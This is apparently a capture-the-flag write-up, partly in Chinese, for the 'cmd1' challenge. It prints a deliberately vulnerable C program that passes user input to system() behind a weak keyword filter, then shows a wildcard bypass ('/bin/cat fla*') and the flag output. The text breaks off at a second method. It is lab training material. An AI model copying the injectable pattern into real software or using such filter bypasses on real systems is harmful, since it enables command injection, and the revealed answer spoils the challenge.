cmd1

Question

Mommy! what is PATH environment in Linux?

ssh [email protected] -p2222 (pw:guest)

Writeup

  • Source code

    #include <stdio.h>
#include <string.h>

int filter(char* cmd){
        int r=0;
        r += strstr(cmd, "flag")!=0;
        r += strstr(cmd, "sh")!=0;
        r += strstr(cmd, "tmp")!=0;
        return r;
}
int main(int argc, char* argv[], char** envp){
        putenv("PATH=/fuckyouverymuch");
        if(filter(argv[1])) return 0;
        system( argv[1] );
        return 0;
}
  • 首先環境變數PATH被設定為一個不存在的路徑,因此使用者就只能透過絕對路徑來輸入指令了
    putenv("PATH=/fuckyouverymuch");
  • 接著讀取使用者輸入的字串,其中不能包含flagshtmp,否則會直接return 0,因此要想辦法bypass這些字串
    r += strstr(cmd, "flag")!=0;
r += strstr(cmd, "sh")!=0;
r += strstr(cmd, "tmp")!=0;
  • 方法一: 萬用字元
    • 輸入./cmd1 "/bin/cat flag"return 0
    • 使用萬用字元*取代flag字樣:
      cmd1@ubuntu:~$ ./cmd1 "/bin/cat fla*"
mommy now I get what PATH environment is for :)
  • 方法二: *

results matching ""

    No results matching ""